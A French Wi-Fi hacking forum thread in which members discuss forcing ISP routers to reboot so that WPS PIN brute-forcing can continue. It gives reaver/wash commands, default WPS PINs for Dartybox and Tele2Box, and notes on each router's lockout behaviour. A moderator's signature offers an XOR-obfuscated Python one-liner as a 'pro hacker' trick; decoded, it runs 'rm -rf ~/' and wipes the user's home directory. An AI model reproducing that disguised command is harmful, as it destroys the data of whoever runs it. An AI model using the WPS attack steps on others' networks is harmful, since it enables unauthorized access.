Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 10-05-2013 13:06:09

lecoolldu94
Banni(e)
Inscription : 16-03-2011
Messages : 16

Faire rebooter livebox à distance (Neufbox & bbox aussi)

Bonjour,

Sous backtrack, c'est possible de forcer une box a reboot de façon externe c'est à dire, sans être connecté à la box.

J'ai une technique qui marche sur les livebox, les neufbox & bbox il faut que je trouve des volontaires.

Merci, je tiens une grosse faille, j'ai besoin de vous là ...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 10-05-2013 23:43:40

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 245

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

On est tous volontaires pour essayer des choses nouvelles. wink
Tu peux expliquer ça ici et tu auras du feed-back, si tu préfères passer par les MP avant de faire public quoi que ce soit, utilise l'option e-mail sous le profil du volontaire pour contacter avec lui.
Comptes sur moi wink
(j'ai une livebox 2.1 à ma disposition)

15uJZ.png

Hors Ligne

#3 11-05-2013 10:36:49

lecoolldu94
Banni(e)
Inscription : 16-03-2011
Messages : 16

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Je t'ai envoyé un email t'indiquant les actions pour débloquer la box

Tu connais des membres qui ont une neufbox ou bbox qui peuvent effectuer des tests ? (avec Reaver)

Tu sais comment faire rebooter une livebox à distance

Merci de ne rien dire sur la technique pour le moment, seulement aux personnes qui test la technique.

Hors Ligne

#4 11-05-2013 13:21:32

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Je vois pas trop l'interet de la faire rebooter même dans le cas du WPS... (en dehors d'une Livebox pour contourner le blocage et encore, je suis pas certain que ca fonctionne...)


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#5 11-05-2013 16:21:29

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 245

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Merci de ne rien dire sur la technique pour le moment, seulement aux personnes qui test la technique.

Je regarde ça tout de suite,
Pas de soucis, je comprends bien que si tu ne l'as pas exposé dans le thème ce n'est pas pour que je mais mette à déblatérer.
C'est ta trouvailles, c'est ton projet, c'est à toi qu'il revient de faire ce que tu veux avec, merci à toi pour la confiance wink


Je vois pas trop l'interet de la faire rebooter même dans le cas du WPS... (en dehors d'une Livebox pour contourner le blocage et encore, je suis pas certain que ca fonctionne...)

Ça doit cartonner un peu plus que la A0 pour récupérer le handshake wink

Je t'ai répondu wink

Hors Ligne

#6 11-05-2013 16:38:13

lecoolldu94
Banni(e)
Inscription : 16-03-2011
Messages : 16

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Pas de soucis, je comprends bien que si tu ne l'as pas exposé dans le thème ce n'est pas pour que je mais mette à déblatérer.
C'est ta trouvailles, c'est ton projet, c'est à toi qu'il revient de faire ce que tu veux avec, merci à toi pour la confiance

C'est juste que pour l'instant je n'ai testé que sur ma box, comme je n'ai pas la config par défaut, il faut faire d'autres testes, d'autres FAI ext ... pour l'annoncer, plutôt que proposer une technique qui pourrait ne pas marcher...


Je vois pas trop l'interet de la faire rebooter même dans le cas du WPS... (en dehors d'une Livebox pour contourner le blocage et encore, je suis pas certain que ca fonctionne...)

On fait un truc, toi tu testes une livebox avec le WPA, moi avec le WPs et on vois qui arrive en premier ..

Ps: sur la mienne 88 secondes (et j'ai attendu le premier blocage soit 60 secondes)

Hors Ligne

#7 11-05-2013 18:12:46

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Je peux faire des essais si tu veux sur :

- Livebox
- BBox
- DartyBox
- Tele2Box

Sinon j'ai une freebox V5 et V6 mais je suppose que si on parle de WPS, ces dernières n'ont pas cette fonction de mémoire wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#8 11-05-2013 18:49:06

lecoolldu94
Banni(e)
Inscription : 16-03-2011
Messages : 16

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Furyo

Pour les tests, il faut pouvior manipuler la box, es-ce ton cas ?

Hors Ligne

#9 11-05-2013 22:03:36

BadGamer
Membre
Inscription : 06-10-2012
Messages : 22
Site Web

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Tu l'a bien desarchivé avant ?
Sinon essaie de prendre le fichier main.c et le compiler chez toi...

Hors Ligne

#10 12-05-2013 00:29:39

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Je suis toute ouïe en MP.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#11 12-05-2013 09:00:55

lecoolldu94
Banni(e)
Inscription : 16-03-2011
Messages : 16

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Tu l'a bien desarchivé avant ?
Sinon essaie de prendre le fichier main.c et le compiler chez toi...

Tu parles de Reaver ?

Hors Ligne

#12 14-05-2013 08:15:16

bidi
N00b
Inscription : 14-05-2013
Messages : 3

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Salut, si tu veux je peux tester sur les deux modèles de Livebox 2 et sur la Livebox 3.

Hors Ligne

#13 17-05-2013 19:54:46

lecoolldu94
Banni(e)
Inscription : 16-03-2011
Messages : 16

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Salut

Bidi tu as les livebox à ta disposition ? C'est à dire, tu peux les toucher, les redémarrer ect ?

Je cherche toujours des propriétaires de Neufbox ou Bbox pour faire le test, il faut savoir utiliser Reaver ou du moins partiellement backtrack.

Aucun risque pour la box, mais si personne n'y met du sien comment avance t-on ?

Hors Ligne

#14 18-05-2013 21:54:38

M!C
Membre Actif
Inscription : 07-06-2011
Messages : 40

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

y a jamais rien pour les freebox sniff, merci free j'ai tout compris !!

Hors Ligne

#15 18-05-2013 22:54:18

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Bonsoir,

Je pense que les gens ont peur de tester sur leurs matos... roll j'ai des boxs qui ne sont plus en ligne mais pas a disposition actuellement.Ceci étant je suis d'accord avec ça:

Aucun risque pour la box, mais si personne n'y met du sien comment avance t-on ?

La plupart des membres sur ce forum attendent que quelqu'un d'autre trouve une solution aux problèmes mais ne savent pas chercher un minimum par eux meme...Donc par ce principe j'invoque "les grands esprits binaires" qui passent par la possédant une box pouvant servir aux tests wink

Hors Ligne

#16 19-05-2013 19:18:08

lecoolldu94
Banni(e)
Inscription : 16-03-2011
Messages : 16

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

bonsoir koala

Même sans abo, si tu pouvais avoir une neuf ou autre box, ça serait bien pour tester

Je pense que les gens ont peur de tester sur leurs matos...

J'ai tester sur la mienne (ça fait 2 semaines que je test pratiquement non-stop) & ma box n'a rien subis comme perturbations (livebox2 ZTE) car les actions sont : appuie sur les boutons (ce qui est fait pour)

L'attaque consiste à voir si la box contre ou non l'attaque

Si vous connaîssez quelqu'un qui a une box, & qui connaît un peu backtrack, parlez en svp, je cherche toujours quelqu'un pour tester sur Neufbox & Bbox (peu importe le pays)

Hors Ligne

#17 21-05-2013 07:58:28

bidi
N00b
Inscription : 14-05-2013
Messages : 3

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

lecoolldu94 : yep j'ai ça à disposition dans ma collec', et on peut tester dessus, pas de problème wink Je te contacte par mail.

Hors Ligne

#18 21-05-2013 08:35:17

bidi
N00b
Inscription : 14-05-2013
Messages : 3

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

lecoolldu94 : l'adresse mail spécifiée dans ton profil ne fonctionne pas, je te laisse donc me répondre ici, on tentera de passer en privé pour les détails.

Hors Ligne

#19 21-05-2013 18:26:21

lecoolldu94
Banni(e)
Inscription : 16-03-2011
Messages : 16

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Adresse email modifiée, la précédente n'étant plus valable depuis un bout de temps (piratée)

Tu peux aller dans les paramètres de chacune des box & me donner le pin WPS de chacune ?

Hors Ligne

#20 21-05-2013 19:14:18

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Je peux t'aider pour les Dartybox et les Tele2Box (routeurs quasiment identiques) wink


Tu travailles sur les PIN par defaut ?

As tu besoin des N° série ou uniquement les PIN par defaut ? (ou autres ?)


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#21 21-05-2013 20:02:24

lecoolldu94
Banni(e)
Inscription : 16-03-2011
Messages : 16

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Furyo sur le déblocage du WPS

Tele2box & Dartybox doivent être vulnérables si le WPs est activé
(tapper : wash -i mon0) normalement ils devraient apparaitre dans la liste, sinon attaque furtive

reaver -i mon0 -b [adresse MAC] -vv

Je veux juste savoir si le pin par défaut des box est bien tous 12345670

Hors Ligne

#22 21-05-2013 20:18:07

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

lecoolldu94 a écrit :

Furyo sur le déblocage du WPS

Tele2box & Dartybox doivent être vulnérables si le WPs est activé
(tapper : wash -i mon0) normalement ils devraient apparaitre dans la liste, sinon attaque furtive

reaver -i mon0 -b [adresse MAC] -vv

Je veux juste savoir si le pin par défaut des box est bien tous 12345670



Merci pour les commandes mais tu ne m'apprends rien wink

Si tu veux connaitre les PIN par defaut, fallait juste demander clairement wink


- Dartybox : PIN par defaut : 12345670 (modele Bwan)
- Tele2Box : PIN par defaut : 47392717 (modele Bwan)


Pour les autres Box, j'attends (sans être convaincu) du partage des PIN...


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#23 21-05-2013 21:06:43

lecoolldu94
Banni(e)
Inscription : 16-03-2011
Messages : 16

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Ces routeurs ne bloquent pas l'AP en 10 heures ça doit être bouclé ...

Ce qui serait interagissant serai si tu pouvais avoir une neufbox ou Bbox qui eux bloquent l'attaque. Pour voir la "faille" leur fait accepter l'attaque comme sur la livebox.

Au passage, quelqu'un a déjà essayé WPScrack sur une box ?

Hors Ligne

#24 22-05-2013 11:22:42

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

lecoolldu94 a écrit :

Ces routeurs ne bloquent pas l'AP en 10 heures ça doit être bouclé ...

Ce qui serait interagissant serai si tu pouvais avoir une neufbox ou Bbox qui eux bloquent l'attaque. Pour voir la "faille" leur fait accepter l'attaque comme sur la livebox.

Au passage, quelqu'un a déjà essayé WPScrack sur une box ?



Desole, mais en France, les BBox ne bloquent pas l'attaque si ce n'est les 5x60 secondes d'AP rate Limit apres 5 tentatives de PIN et ensuite l'attaque reprend. Donc aucuns soucis de mon coté sur une tentative d'essai sur Bbox wink


Les NeufBox (ou SfrBox) NB4 ou NB6, par contre, oui , elles empechent l'attaque. (Impossible de s'associer puisque il faut appuyer sur le bouton WPS)
Les Livebox se bloquent carrement et en fonction du nombre d'essais, le temps avant deblocage peut être très long...

C'est juste mon retour d'experience apres quelques essais wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#25 22-05-2013 11:47:42

lecoolldu94
Banni(e)
Inscription : 16-03-2011
Messages : 16

Re : Faire rebooter livebox à distance (Neufbox & bbox aussi)

Desole, mais en France, les BBox ne bloquent pas l'attaque si ce n'est les 5x60 secondes d'AP rate Limit apres 5 tentatives de PIN et ensuite l'attaque reprend. Donc aucuns soucis de mon coté sur une tentative d'essai sur Bbox

Je n'ai pas de bbox autour sad


Les NeufBox (ou SfrBox) NB4 ou NB6, par contre, oui , elles empechent l'attaque. (Impossible de s'associer puisque il faut appuyer sur le bouton WPS)
Les Livebox se bloquent carrement et en fonction du nombre d'essais, le temps avant deblocage peut être très long...

Les neufbox, si tu peux t'associer, et il n'y a pas de blocage, par contre, le processus tourne en rond au bout de 90.91% je crois

Les livebox, l'attaque réussis, si tu lances Reaver & que tu appuyes sur le bouton WPS ou si tu redémarres la livebox.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
7 282 23-11-2016 18:46:08 par koala
35 1693 23-11-2016 16:31:33 par roofnat
5 129 22-11-2016 18:48:09 par koala
12 10379 22-11-2016 15:12:09 par kcdtv
1 190 21-11-2016 15:38:39 par koala

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]